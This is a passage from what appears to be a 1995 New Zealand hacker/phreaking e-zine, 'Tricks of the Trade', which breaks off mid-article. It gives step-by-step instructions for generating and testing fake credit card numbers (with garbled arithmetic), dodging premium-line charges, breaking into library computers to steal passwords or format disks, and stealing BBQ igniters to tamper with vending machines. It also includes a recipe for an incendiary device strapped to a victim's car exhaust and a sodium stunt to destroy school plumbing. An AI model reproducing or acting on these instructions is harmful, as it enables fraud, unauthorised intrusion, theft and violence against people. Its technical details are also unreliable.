
-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-

        __________   .____  ________  _____.____  __________________
        \_ ______/___|_   \_\_ ____/_ \_   |    \_\_  ___________   \_
       _/   ___/_/   |/    /    |/   \_   ___  __/   ____)__   |/    /
       \     |  \    |    /     |     /    |/   \_    |/   |   |    /
        \____|   \_______/ \_________/l____|     /____.    |_______/
                                           l____/     `----'
                                             _____
              ___   ________        _________\_ __l___  _________
             (___) _\_____  \_      \____ __________  \_\_  ____/
             |    \_    |/    \        |   | |    |/    \  ____)__
             |     /    |     /        |   | |    |     /   |/   |
             l____/l____|____/         l___| l____|____/____.    |
                  _____       adk!                          `----'
                  \_ __l___  ___________________   ________
  'ø3ø pOWER!     |  \___  \_\_  ____________ _/ __\____   \_ sYSOP:
                  |    |/    \  ____)__   ___   \_    |/    /   bAD lANGUAGE
 34ø mEGZ oNLiNE  |    |     /   |/   |    |/    /    |    /
 1.7 giG oFFLiNE  l____|____/____.    |_________/l________/     28k8 sUPRA
                                 `----'                         14k4+ oNLY!

 -[ ø-dAY aMiGA wAREZ! ]-[ HP^ · iMAGiNE · LsD DøCS · CøNF's ]-[ K-RaD cPS!]-  

                                 +64-42-eLiTE
                   ..aND dON'T fORGET, yOU'LL nEED tHE nUP!


-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-

@BEGIN_FILE_ID.DIZtRICKS oF tHE tRADE - issue 04
@END_FILE_ID.DIZ
  
 ATZ
 OK
 ats11=35
 OK
 at
 OK
 atdt3820173
 
 CONNECT 14400
 
 please press (enter)...
 
 password: h4ck3rzh1ghw4y
 
 incorrect!
 
 password: h4ck3kz_h1ghw4y
 
 Yeah!
 
 username: Hyp3
 password: 
 
 hhbbs% zcat tot03.txt |more 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 YeS, We rrrRRR BaCk dEwDz..       -       tO BRiNg u AnOThEr ToT PRodUCtioN!
 
  
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 ----------------------.`::::::::::::::::::::::::::::::::::::::::::::::::::::
 ::::::::::::::::::::: | ::::::::::::::::::::::::::::::::::::::::::::::::::::
 ::::::::::::::::::'.--+--------------------------------.`:::::::::::::::::::
 :::::::::::::::::: |       TRiCk'z oF THe TRadE!       | :::::::::::::::::::
 ::::::::::::::::::.`--------------------------------+--'.::::::'_ _ __ _ ___
 :::::::::::::::::::::::::::::::::::::::::::::::::::.`-----------------------
 ::::::::::::::::::' ______________`::::'______________`:::::::::::::::::::::
 :::::::::::::::::::.\___      ___/ `::' \___      ___/.:::::::::::::::::::::
 ::::::::::::::::::::..\        /.--------.\        /..::::::::::::::::::::::
 ::::::::::::::::::::::.\      //         .\\     //.::::::::::::::::::::::::
 _ _ ____ __ _`:::::::::.\   .//           \\\    /.:::::::::::::::::::::::::
 ----------------------.`.\ // \____________/ \  /.::::::::::::::::::::::::::
 ::::::::::::::::::::: | :.\/................. \/-nT0 :::::::::::::::::::::::
 ::::::::::::::::::'.--+--------------------------------.`:::::::::::::::::::
 :::::::::::::::::: |   i.S.S.U.e  n.U.M.B.E.r  # III   | :::::::::::::::::::
 ::::::::::::::::::.`--------------------------------+--'.:::::::::::::::::::
 ::::::::::::::::::::::::::::::::::::::::::::::::::: | :::::::::'_ _ ___ __ _
 :::::::::::::::::::::::::::::::::::::::::::::::::::.`-----------------------
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
                               -[ iNTRODUCTiON ]-

    Please READ!!!! Please READ!!!! Please READ!!!! Please READ!!!! Please
    `-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^-'
    This ZiNE which we call tRICKZ oF tHE tRADE is only for informational
    purposes only, So if you use the info here n get phuQ'd over by a big
    company or the PiGZ remember i warned you so its your phuQ'n risk not   
    mine.. Ok, but most of all get out their and have PHuN! =] =[ =] =[ =  
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    
               T- ry to be quick 
               R- ead articles twice if you dont understand
               I- nfo is power!
               C- redit cardz r good! use em
               K- eep out of trouble
               Z- ip your files with gzip 
    
               O- pen all dirs till you find what ya lookin for
               F- ind out who you are phuQ'n with!
    
               T- ime is money
               H- aq'n is PHuN!
               E- asy haQ'n -never heard of it!
     
               T- hink 'What would happen if i get caught?'
               R- emember the warning!
               A- sk around to learn
               D- ont narq on ya matez
               E- ventually you will get caught,..
                  Only if you do somethin stoopid tho
    
             ___________ _______________
          . /~~~~~~~~~~/`                `.
                      /                   .
                     (    TRiCKz  Of      !
                      \  _________,  t    |
                       \_/        !  H    |
                   ____.'         |  e    |
                 //               |       |
                 /                |  T    |
                .                 |  R    |
                                  |  a    |  
                                  |  d    |
                                  |  E    `
                                  '        `--.
                                 '             \
                                :   o8/o5/95    .
                                |  .        .   !
                                |  |  !  !  |'  '
                                |  |  |  |  |  /
                                `--|__|__|  |-'
                                         |  |
                                         |  |
                                         !__|


             .--------------------------------------------------. 
            !     . ......:::::[ CONTENTZ ]:::::...... .         !
            |                                                    |
            | 1.. TRiViA FUN........................... Hype     |
            | 2.. CC GENERATOR......................... Hype     |
            | 3.. DiVERTER 0900........................ Hype     |
            | 4.. CiTYNET HELP......................... Hype     |
            | 5.. LiBRARY HACKiN'...................... Nick     |
            | 6.. CLiCKER COMPLAiNT'Z.................. Hype	 |
            | 7.. NEW'Z BOUT B.S.A..................... Red Lion |
            | 8.. iMPULSE BOMB......................... Posca    | 
            | 9.. FTP SiTE'Z........................... Hype     |
            | 10. FAKE iD'Z............................ Red Lion |
            | 11. EXPLODiN PiPE'Z...................... Kevin    |
            | 12. 7 LiTTLE POSTiE'Z.................... StiGZ    |
            | 13. LOCKSMiTH'Z.......................... Red Lion |
            | 14. BOARD'Z TO CALL...................... Hype     |
            | 15. MC'D TiP'Z........................... Nick     |
            | 16. POSTiNG FOR FREE..................... Hype     |
            | 17. BBS HACKiN'(PT1)..................... Hype     |
            | 18. BBS HACKiN'(PT2)..................... Red Lion |
            | 19. SLPASS............................... Hype     |
            | 20. PASSWD LiST.......................... Red Lion |
            | 21. UNiX SYSTEM'Z........................ Red Lion |
            | 22. EGG EXPERiMENT....................... GreyRat  |
            | 23. FREE PiZZA........................... Hype     |
            | 24. DiSABLE CW........................... Hype     |
            | 25. JAMMiN CARD FONE'Z................... Hype     |
            | 26. MiCROWAVE'Z.......................... BaD L    |
            | 27. POOL BOMB............................ PhOdEr   |
            | 28. FREE PHOTOCOPiE'Z.................... BaD L    | 
            | 29. GREET'Z.............................. Hype     |
            ! 30. LAST WORD'Z!......................... Hype     !
            `----------------------------------------------------'


-----------------------------------( 1 )------------------------------------
                                TRiViA FUN!

----------------------------------by Hype-----------------------------------
  
  Ok, letz kick off with some tipz to beating a phuQ'n trivia game-line. 
  It aint as easy as you might be thinkin, takes a while but does work!!
  
  What you do is get a big piece of paper.. and write numbers 1-10 at the
  top of the page like this.. (Some Trivia's might have 20q's im not sure)
  
  
  q: 1  2  3  4  5  6  7  8  9  10

  Now dial the Trivia line - Try cliff's trivia - refer to Article 3.. 
  "Diverter 0900" Now write.. 
  
  3  3  3  3  3  3  3  3  3  3
  
  (just below the 1234...)
  
  oK, just push "3" on your dtmf phone for each answer..
  now if you got 4/10 then do this.. eg: 
                                 .-.
  3  3  3  3  3  3  3  3  3  3  ( 4 )
                                 `-'
  Now do..
                                 .-.
  2  3  3  3  3  3  3  3  3  3  ( ? )
                                 `-'
                                 
  If you get 5/10 then the answer for question 1 is 2..
  If you get 4/10 again then the answer for question 1 is 1
  If you get 3/10 then the answer for question 1 is 3
  
  When you figure out the answer for q1 then put the answer above
  your numbers 1-10.. eg..
  
  a: 2  (and so on...............)
  
  q: 1  2  3  4  5  6  7  8  9  10
  
  To win you must get either 9 or 10 correct.. This can take ages 
  but hey it work's so dont complain bout it =]
  
  Ok, now that you get the pattern, here's one more to make sure
  you understand the procedure of cheating..
  
  Say, if i did 2 for all my answers and got 7/10 then i would do
                                 
                                 .-.
  3  2  2  2  2  2  2  2  2  2  ( 8 )
                                 `-'
  and if i got 8/10 then i would do
  
                                 .-.
  3  1  2  2  2  2  2  2  2  2  ( 7 )
                                 `-'
  and if i got 7/10 again i would do
  
                                 .-.
  3  2  3  2  2  2  2  2  2  2  ( 7 )
                                 `-'
  and if i got 7/10 again i would do
  
                                 .-.
  3  2  1  2  2  2  2  2  2  2  ( 9 )
                                 `-'
  and if i got 9/10 ..... etc etc
  
  
  This isnt easy at all actually, it'z so phuQ'n confusin as you move
  on, while getting either a higher total or lower then work out the
  pattern, and hopefully you will get atleast 9 or 10 correct at the
  end of your move's.
  
  One time i did this for atleast 2hr's (since the game line kept
  muting and was very slow) and got 10/10 and the answer's were like
  this...
  
  a: 3  1  2  1  2  3  3  3  3  3
  
  q: 1  2  3  4  5  6  7  8  9  10
  
  TiP'Z
  ~~~~~
  
  Do you notice Trivia and game-line's alway's like using lot's of 3'z
  in the answer's cause that way they make extra money cause then you
  might listen on to the other possible choice's for your answer..
  
  So i would suggest to start with 33333... and do the trivia pattern
  
  Alway's hit the button staight after the bit that says "Ok, now heres
  another question, question 2" etc... (some trivia's piss me off cause
  they say "Please wait till i have finished" - but that happen's if 
  you press the button before the question's have been asked..
  
  
-----------------------------------( 2 )------------------------------------
                               CC GENERATOR!

----------------------------------by Hype-----------------------------------

  Is it possible?!> YES! how else do ya think Checksum does it =]
  Its piss easy, just grab a pen, and paper and do the following.
  
  You could use the following method to generate mastercard's, visa's,
  American Xpress, ETC ETC 
  
  1> Choose a number ok, for instance we want a visa card.. ok
  
     4xxx xxx xxx xxx
  
  2> Now put in random numbers in the x's like this
  
     4999 008 435 08x
     
  3> The last digit is left out so we can do some mathematics
  
  4> Take out the `EVEN' numbers
  
     4,0,0,8,4,8,0 (x2)
     
  5> Times each even number by 2 so that you get this   
  
     8,0,0,16,8,16,0
     
  6> If any digit is higher than 10 subract 9 from it   
     (so 16 become's 7.. get the idea?)
     
     8,0,0,7,8,7,0
     
  7> Now add `em all up..
  
     8+0+0+7+8+7+0 = 30
     
  8> Look at the 12digit visa number you made from the begining..   
     (4999 008 435 08x)
  
  9> Take out the `ODD' numbers   
  
     9,9,9,3,5 (x2)
  
 10> Times each odd number by 2 so that you get this
 
     18,18,18,6,10
     
 11> If any digit is higher than 10 subract 9 from it
     (so 18 become's 9.. get the idea now!?)
     
     9,9,9,6,1
     
 12> Now add `em all up..
 
     9+9+9+6+1 = 32
     
 13> Now subract the highest total by the lowest total. like this,..
 
     32  in other mathematical reasons =]  32-30 = 2
    -30  (dont forget that we got 30 from adding our last total)
   ~~~~
      2 is the x
      
 14> There ya have it.. 4999 008 435 082 (Valid card)
   
 15> Expiry date's.. just make one up, here use this: 04/96
 
 How rad.. Easy aint it.. I use this method heapsa time's i even make
 card's up while im in my math's class.. teacher's wouldnt have a phuQ'n
 clue what ya up to =] heheh
                                
 HOW TO TEST A CREDIT CARD TO SEE IF VALID
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Dial 012
 Area code 04
 Local no: 3820172 (Any number)
 Put the card number in when it asks you to..
 If says "Please enter your expiry date" card is NOT valid
 If says "the number you have called is not available from
          your location" The card is VALID
 If says "Please enter your pin" you have done a calling card
          number not a credit card
 
 Thats how its done.. Thanx to ??? (doesnt want to be known)
 for the tip!
 
 GENERATING CARDS
 ~~~~~~~~~~~~~~~~
 Now do you see the pattern!? >3-^)

 .--------------------------------.    .---------------------------------.
 |   4760 354 551 22x             |    |              4989 310 244 01x   | 
 |                      __________.    .___________                      |
 |   even no:s          |    _________________    |   even no:s          |
 |   ~~~~~~~~~          |  .!!!!!!!!!!!!!!!!!!!.  |   ~~~~~~~~~          |
 |   4,6,0,4,2,2 (x2)   |  |:::::::::::::::::::|  |   4,8,0,2,4,4,0 (x2) |
 |   8,12,0,8,4,4       |  |: :: :::'::::::::::|  |   8,16,0,4,8,8,0     |
 |   8,3,0,8,4,4 = 27   |  |` .  :|    |''::: ;|  |   8,7,0,4,8,8,0 = 35 |
 |                      |  | .   .|    |   :  .|  |                      |
 |   odd no:s           |  |      |    |   .   |  |   odd no:s           |
 |   ~~~~~~~~           |  |     .|    |       |  |   ~~~~~~~~           |
 |   7,3,5,5,5,1        |  |      |    |       |  |   9,9,3,1,1 (x2)     |
 |   14,6,10,10,10,2    |  |      |    |   .   |  |   18,18,6,2,2        |
 |   5,6,1,1,1,2 = 16   |  |      |    |       |  |   9,9,6,2,2 = 28     |
 |                      |  |      |    |       |  |                      |
 |   27 - 16 = 11       |  |      |    |       |  |   35 - 28 = 7        |
 |   11 - 9  =  2       |  |      |    |       |  |                      |
 |                      |  |      |____|       |  |                      |
 |   4760 354 551 222   |  `.                 .'  |   4989 310 244 017   |
 `----------------------'   `-----------------'   `----------------------'
 
 
-----------------------------------( 3 )-----------------------------------
                               DiVERTER 0900

----------------------------------by Hype----------------------------------
 
  Ok, this is just a cool diverter.. which doesnt cost cause it's a local
  Wellington number ..Well if you called this diverter from Auckland then
  you might see a bill =]
  
  anyway it work's like this
  
  Dial 382xx-xx
  
  Now where the last 2 x's are is supposed to be the kode of the
  following 0900 line's..

  Here'z the kode'z
  ~~~~~~~~~~~~~~~~~
  00-msg            21-HelpLine      42-msg           63-Quiz Call
  01-msg            22-Vote Line     43-Hero Hotline  64-Joke Line
  02-msg            23-msg           44-Weather *     65-Vet Line
  03-info           24-msg           45-msg           66-Weather Line
  04-msg            25-msg           46-HelpLine      67-Weather Line
  05-client service 26-msg           47-Weather Line  68-xxx Line
  06-msg            27-Coronation    48-Cliffs Trivia 69-Weather Line
  07-NBA line       28-msg           49-msg           70-Weather Line
  08-msg            29-msg           50-vmb psw:2222  71-???
  09-Concert line   30-msg           51-S.o.Century   72-Weather Line
  10-msg            31-msg           52-xxx Line      73-Weather Line
  11-msg            32-Cancel Line   53-Weather Line  74-Weather Line
  12-Red Cross      33-msg           54-Ubix VoteLine 75-Tv Soap Updte
  13-msg            34-N.c.plaza     55-Red Cross     76-Keno Results
  14-msg            35-msg           56-msg           77-Weather Line
  15-msg            36-msg           57-msg           78-???
  16-msg            37-Weather Line  58-DB comp       79-Lucky No:s
  17-Game Line      38-Weather Line  59-Dream Dollars 80-Classic Hits
  18-msg            39-Weather Line  60-Trackside     81-Weather Line
  19-Cricket info   40-Weather Line  61-Weather Line  82-Weather Line
  20-TeleData       41-Weather Line  62-Capital City  83-Vmb - crd srv
                 
  84-msg            90-Nz on Air     96-Vmb
  85-Asia info      91-Auzzie Line   97-Clear Vote
  86-msg            92-Weather Line  98-Inside Line
  87-Vmb            93-Asia info     99-Weather Line
  88-msg            94-info
  89-Sex Line       95-Keno Results
  
  Ok, for example you wanna call Cliff's Trivia then do 
  
  382xx48
   
  HMmm that cant be right... whats the numbers after 382...???
  Sorry, but its a diverter and if everyone knows it then the line will
  go down soon!!! Ok, so if you want the rest of the number then
  either CONTACT me with your correct inpho! OR: ask around..
  Mail me on Bad Sector or the internet mail addie for ToT which
  will be up soon...
   
  TOT_R@ix.wcc.govt.nz
  
  Or use toneloc and do a scan.. you decide! Oh and dont think that
  everyone that leaves me mail will get the number!
  
  Now, just if you're thinking why does it say (calls cost 2.99 per min)
  etc, well thats cause the 382xxxx calls the 0900 no and lets them do
  the paying not you, It was quite easy to find as on some they say "if
  you find any problem's with this line call wellington on 3821777.
  
  This diverter is for informational purposes only dont use it cause
  its illegal! =]
  
  PhUN iS tHe WoRd!
  
  Ed: Some of the kodes might be changed or dead, these were done about
  3wk's ago! so look for the new ones ya self.
  If you find new 0900lines which arent in the list pleez dont edit
  the list in this issue, if possible mail me the kodez and i will throw
  em in on the next issue!
   
 
-----------------------------------( 4 )------------------------------------
                               CiTYNET HELP!

----------------------------------by Hype-----------------------------------

  This article is kinda like a begginers guide to using citynet/internet..
  first get your account then do the following..
  (Make sure you have vt102 mode on if ya commz proggie supports it)
  
  How to use FTP:
  ~~~~~~~~~~~~~~~
  Login Citynet
  
  Goto 'Network services'
  
  Goto 'Lynx'
  
  Hit 'g'
  
  Type..
  ftp://(ftp_site ya want)
  
  How to use TELNET:
  ~~~~~~~~~~~~~~~~~~
  Login Citynet
  
  Goto 'Network services'
  
  Goto 'Lynx'
  
  Hit 'g'
  
  type..
  telnet://(telnet_site ya want)
  
  How to use IRC:
  ~~~~~~~~~~~~~~~
  
  Login Citynet
  
  Goto 'Network services'
  
  Goto 'Irc' (Internet Relay Chat)
  
  Type.. 
  alias/handle ya want to use
  
  Type.. [server]
  w6yx.stanford.edu  <or>
  irc-2.mit.edu
  
  Type.. [port]
  6666  
  6667  
  6668
  
  Type.. [name]                   
  Account name or just hit 'enter'
  
  HEREZ THE MAIN CMD'S YOU USE WHILE IN IRC..
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  /cls                [clear screen]
  /nick (new alias)   [change alias]
  /quit               [leave irc]
  /exit               [leave irc]
  /time               [shows time]
  /w #(conference)    [shows users on conf]
  /m (alias) (msg)    [priv8 msg to 'alias']
  /j #(conf)          [join a conf/topic]
  /p #(conf)          [part from a conf)
  /help               [list of command's]
  /i (alias) (conf)   [invite user]
  
  To chat with some cool hackers then from the irc prompt type..
  
  /j #hack
  
  If you want to talk to a dewd say if his handle was 'DrDR3'
  Then you would type..

  /m drdr3 `ello, u got a proggie called Nuaskamazzer?..
  (etc etc..)

  say if 'drdr3' said No! 
  then you would say..

  Ne1 here heard `f nuaskamazzer??

  ^-This will make the msg public and by any chance if someone is
  watching they might reply with your answer, may take time..

 
  Now that you have the main facts log on to irc and have some fun
  always remember to use your real alias cause if you get caught
  using someone else's you will get dropped badly!

  How to download files from FTP:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Once you are on a ftp_site use the arrow keys to choose your destination
  so say if you saw..
  
  Mar 29 01:23  Directory        hack
  Mar 30 01:35  text/plain       xlite00.txt  4Kb
  Mar 30 01:36  text/plain       xlite01.txt  17Kb
  Mar 30 01:38  text/plain       xlite02.txt  13Kb
  Mar 30 01:38  text/plain       xlite03.txt  7Kb
  Mar 30 01:43  text/plain       xlite04.txt  11Kb
  Mar 30 01:43  Directory        misc 
  Mar 30 01:43  Zip File         mhack10.zip  45Kb
  Mar 30 01:43  Zip File         mhack15.zip  57Kb
  Mar 30 01:43  Directory        phreaking  
  Mar 30 01:45  Directory        security
  Jun 10 01:57  Zip File         slhack.zip  62Kb
  Jun 23 01:57  text/plain       slhack.nfo  2Kb
   
  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

  etc, etc
  then what you do is move the cursor on the directory ya want.. and then
  either hit 'enter' or '->' arrow key.
  
  -note..
  -Always give the network time to connect to sites if the connection
  -fails it will tell you, which could mean either it's too busy or you 
  -might of typed in a in-correct ftp_site.. Sometimes by trying the 
  -same site again you should get through if not then hit 'z' to stop/
  -abort connection.
  
  You should get more directory's and file's by any chance, if you
  see something you want then just move cursor on the file and hit
  'd' this will dl the file to your citynet a/c if you wish to 'save to
  disk'.. now once thats done you can copy the file as it is or as a 
  filename you choose.. etc
  
  Ok, lets say you had dl'ed bout 10-12 files then press 'q' to quit
  lynx (ftp) and goto main menu and then goto 'file management' choose
  'directory' *.* If you're not sure whats in your directory.. and
  then go to 'Zmodem 1987 send' ok now say if you had big1.zip big2.zip
  big3.zip big4.zip etc etc/.. then to dl these ..next to qualifiers
  type..
  
  big1.zip big2.zip big3.zip big4.zip 'enter'
  'space' 'enter'
  
  This should go to your dl window like your commz proggie normally does
  and transfer the file's you have typed in, I dont think you can use
  
  big*.* 'enter'
  'space' 'enter
  
  But try it if you like.. cant remember tho. Now heres the list of
  command's to remember..
  
  d                   [download file]             
  z                   [stop connection]
  q                   [quit lynx]
  *.*                 [view your dir]
  zmodem 1987 send    [download files]
  ->                  [open directory]
  'enter'             [open directory]
  
  deleting filez:
  ~~~~~~~~~~~~~~~
  This is easy enough..
  
  goto 'File Management'
  goto 'delete'
  type  *.*;*
   
  this will go through all the files in your dir and ask you what you
  want to delete if you dont want the file deleted then do 'n' when
  it asks for that particular file/files you want!
            
  hmm, thats bout it i think, Ok hope this article help's out those
  ppl that were sufferin to use internet etc..
  
  Downer:
  ~~~~~~~
  When dl'ing you cant tag you get one file at a time which really sucks
  but atleast you're not payin for the fuqin ware'z which is good really
  
  Just do what (Sandman) done for me, make a script file which dl's a file
  then it goes auto to the file under,, well thats not exactly the way
  Sandman's script work's it asks you how many files ya gonna get.. so 
  i type eg: 5 then it gets the one i have my cursor on and the other 4
  under that file, got what im sayin.. Good!! =]
  
  HaVe PHuN!!
  
  
-----------------------------------( 5 )------------------------------------
                              LiBRARY HACKiN'

----------------------------------by Nick-----------------------------------
                        
  Libarians alway's get fucked off when ppl muck around with the library
  computer.. so what ya do is:
  
  Reset the computer.. Eg's: CTRL,AMIGA,AMIGA :) CTRL,ALT,DEL
  Press.. 'CTRL C' or 'CTRL BREAK' Continuesly while the system is 
  re-booting.. you should get a quote saying,.. .
  
  Terminate batch job y/n ?
  
  The abvious answer is 'y' this should drop into the dos system.. now
  you can format the hard-disk :) or you might wish to snoop around 
  looking for interesting input and passwd's by any chance! 
  
  So start by doing a 'dir' then if you see a file called 'Config.exe'
  then load this fucker up! By any chance you might be able to edit 
  the 'loading paths' to access the library content's etc, or may be
  able to change or use the libarian's password! 
  
  Normally they use easy (guessable pswd's egs:Libarian's middle name or
  first name.. eg's: Rose, Ruby, Blossom, Jane, etc, the list goes on!!
  If you dont find the psw's then try doing things lady's envy.. :)
  sex, men, flower types, fav colour's, dog types. 
  
  If you fail to get the psw's then format the hd or play a game if you
  find one on the dos.
  
  Sometimes the config file isnt in the main dir, so try b: c: d: e:
  etc, and open dir's till you find a file called Config, oh and it
  may also be called Cfg.exe
  
  One time when me and Hype hacked a library computer the cfg file was
  not executable, so we had to view it with the ole 
  
  type cfg
  
  etc etc.. and then we read the content's till we saw interesting word's
  among all the garbage in the file! We then got into the main menu  
  area (kinda like a sysop only menu) where it had more opt's like edit
  Student, Expired books .. you know shit like that, What then pissed
  us off is that every option was secured by a system-psw..
  Eventually me and Hype found out the the system-psw was 'Puppy'
  
  Thatz all i wanted to say, so maybe you might want to go through a 
  library computer hacking journey..
  
  "May the Hacker be with you"
  
  [ed - hehe, actually me and Nick done this just 2-3 wks ago.. The
   libarian never found out, well she probably noticed by now the
   paths were switched around so instead of loading the library 
   system it loaded the <private> Main menu! =]
   

-----------------------------------( 6 )------------------------------------
                            CLiCKER COMPLAiNT'Z

----------------------------------by Hype-----------------------------------
  
  PhuQ'n Complaint'z,, aarghh!
  
  In the last 2-3 mth's i have had atleast 15 complaint's from user's on
  board's that i call! Now, phuQ'n read this article and hopefully you
  wont complain again!! 
  
  'It'z a phuQ'n load of bullshit, it doesn't work!" - BaD LaNGuaGe
                                                       
  Actually, the reason why ppl are complainin is cause they havent found
  a proper clicker! you must find the one which looks exactly like the
  clicker diagram in tot #2.. If you cant find one that matche's the
  description, then you can phuQ me off! But not till you try the right
  one, for the right results..
  
  Point the ignition point close up to the machine/vid game/vendor etc
  and push the button 3-4 time's till you get the thing phuQ'd, or even
  a free cred.. for coke, games, etc etc!! PLeeZ tRY iT!!
  
  I havent got any clicker's left on me, so ya just gonna have to risk
  ya self, and use the idea's from tot 2.. 
  
  I find the BBq the easiest to get.. Here'z a new way..
  
  Go to a house knock on the front door and say would you like to give
  donation's for my school so we can go on a camp.. Or some shit like
  that! Then try the next house until you find a house where the ppl
  arent home or have gone out for the night! So once you hit the right
  area/spot then go round the back of the house (try Big nice house's)
  and look for a bbq! I have gone to a few houses in my street and 
  seen their bbq's but i havent taken their clicker's cause i know most
  of my neighbours etc.. So maybe if you are too frightened to get the
  clicker ya self then brag on to some tough dick at school and say
  hey man can you get me one of those 'ignition button' thingy'z in
  the bbq? Just tell him that if he get's one for you, you will buy him
  a coke.. (or whateva) anyway's figure it out ya selve's it aint hard!!
   
  L8r
                                                       
                                                       
-----------------------------------( 7 )------------------------------------
                             NEW'Z BOUT B.S.A!

--------------------------------by Red Lion---------------------------------

  The Bsanz [Buisness Software Alliance Of New Zealand] 
  Every major overseas country has got their own version of them,
  its FAST in the UK [Federation Against software theft] the BSA
  in Australia...
  
  In New Zealand with the odd publicity and the odd appearance
  in the media threatening to get pirates, theres been little
  heard. Occasionally one or two individuals have been arrested
  ,and there's certainly been alot of rumoured actions by this
  group. Everything from sending private investigators into the
  bbs's to arresting sysops for private 'pirate' sections has
  been blamed. So far, there has been little agressive widespread
  campaigning or advertising by the BSANZ Thats about to change.
  
  The new copyright laws, means that the outdated 1961 copyright
  act is no longer needed to be used to punish computer pirates.
  Instead for the first time in New Zealand, from January 1st 95
  the new copyright legislation, can be used to enforce the law.
  Its got fines of up to $5000 per offense with imprisonment as
  a possibility. In conjuction with this from the BSANZ there's
  a new reward scheme operating for information leading to  
  prosecution of computer pirates.
  
  Thats all i have really found out so far about the BSANZ
  maybe put more info bout these guys in next issue of ToT!!
  

-----------------------------------( 8 )------------------------------------
                               iMPULSE BOMB!
  
---------------------------------by Posca!----------------------------------
  
 Impulse Bomb
 ~~~~~~~~~~~~
 Ingredient'z

 Impluse - deoderant can
 Insulation tape
 Roll of copper wire (0.5 mm)
 1/2 Litre of diesel (petrol)
 360g of soap (i perfer lux - herbal extracts)
 1 roll Gladwrap

 Grate the soap into fine piece's and place them in a deep old bowl that
 you dont use. Next you pour the diesel into the bowl and let it settle
 for a few minute's. Stir the mixture till it's nice and thick (make sure
 it isnt bubly or lumpy) Let the mixture dry a bit.

 Make sure you take off the cap from the Impulse can first..
 Get a full can of Impulse and wrap the copper wire evenly around the can
 approximately 50 turns. This is the accelerating ignition for the bomb
 because copper conducts heat better than aluminium.

 Grab the Impulse can and dip it into the mixture, then pull it out.
 Use the spatula to coat the can evenly with the mixture. It should be at
 least 3mm thick. Get the gladwrap and wrap it 3 times around the can.
 
 Find yourself a victim, the bomb is ready. Find the car your victim own's
 and make sure the exhaust pipe is cold, get the insulation tape and strap
 the Impulse can on the base of the exhaust pipe.. See diagram below

                                             ____________________
                                        . ' _____ __     _________
                                       /   /        \   /        /
                          ____________/   /_________/  /________/
                         /
                        /             
                        \           . --- .
  _______         .--------       .         .
 |impulse:'  -->  |exhaust\______.     o     ._____________________
                                 `.         .'
                                    . ___ .  
                                
 Make sure the impulse can is about an inch in the exhaust pipe.
 When the victim drives the car It will take 5mins max to ignite!
 This is highly dangerous, especially the car which is riding behind your
 victim because the can could back-fire and smash that persons car too!

 CAUTION:

 This bomb is highly explosive to ford-cortina's and most holdens cause
 the petrol is fairly close to the exhaust pipe causing multiple
 explosions!


-----------------------------------( 9 )------------------------------------
                                FTP SITE'Z!
  
----------------------------------by Hype-----------------------------------
                                    
  Herez a quick list of some FTP site's [h/p] and [MiSc]..  
  
  * = good site!
 ?  = dead???
  
  
    h/p SitE'z                        DiR'z to get to h/p/a phile'z 
    ~~~~~~~~~~                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  * ftp.eff.org                       /pub/net_info/net_culture/
                                      cyberpunks_hackers/publications
 ?* corrupt.sekurity.com
    Paradox1.denver.colorado.edu 
  * Spy.org                           /pub/security
  * ftp.netcom.com                    /pub/br/bradleym 
    ftp.usask.ca                      
 ?  bach.berkeley.edu
    freeside.com
    ftp.halcyon.com                   /pub/cud
  * aql.gatech.edu
    bellcore.com
 ?  cert.org
    cipher.com
  * deimos.cs.uah.edu
  * ftp.winternet.com                 /pub/users/craigb
  * etext.archive.umich.edu           
 ?  unix.security.comp
  * lod.amaranth.com
  * ftp.std.com                       /obi/mischief
  * ftp.std.com                       /obi/phracks
  * ftp.std.com                       /archives
  * ftp.clark.net                     /pub/jcase  
    ftp.virginia.edu                  /pub/security
 ?  bnlux1.bn1.gov                    /pub/pezz  
    wiretap.spies.com
    phred.pc.cc.cmu.edu
 ?  zero.cypher.com
    cpsr.org                          /cpsr
    black.ox.ac.uk
 ?  world.std.com
    quartz-rutgers.edu
  * hpacv.com
 ?  crimelab.com
  * dartmouth.edu                     /pub/security
  * ftp.netcom.com                    /pub/zz/zzyzx
  * ftp.mcs.com                       /mcsnet.users/crisadm/stuff/
                                      research/samples
  * mary.iia.org                      /pub/users/patriot
    lcs.mit.edu                       /telecom-archives
  * nic.funet.fi                      /pub/doc/cud
    pyrite.rutgers.edu                /pub/security
    suburbia.apana.org.au             /pub/unix/security
  * net23.com                         /pub
 ?  irbis.llnl.gov                    /pub
 ?* rena.dit.co.ip                    /pub/security
    
    miSC SitE'z
    ~~~~~~~~~~~
  * ftp.nevada.edu
 ?  merit.edu
 ?  ftp.src.doc.ic.ac.uk
 ?  sura.net
    a.cs.uiuc.edu
    cs.utah.edu
    134.129.111.64
    
  Hope these give you a good start on the internet! Once you get use to
  using it start to talk to the dewd's on irc H/p conf's and ask them
  if they know of any rad site's etc etc..
   
  -refer to my artcile "CiTYNET HELP" if you dont know how to use the
   FTP or IRC


-----------------------------------( 10 )-----------------------------------
                                 FAKE iD'Z!

--------------------------------by Red Lion!--------------------------------
 
  This is been delayed till TOT issue #o4
  
  sorry!


-----------------------------------( 11 )-----------------------------------
                              EXPLODiN PiPE'Z!

----------------------------------by Kevin----------------------------------

  Just get pure Sodium (Na) and throw heaps in the school toilet, now 
  flush the toilet and get the fuck outta there! before explodin pipes
  come outta the ground!! hahah! This is really funny, cause the school
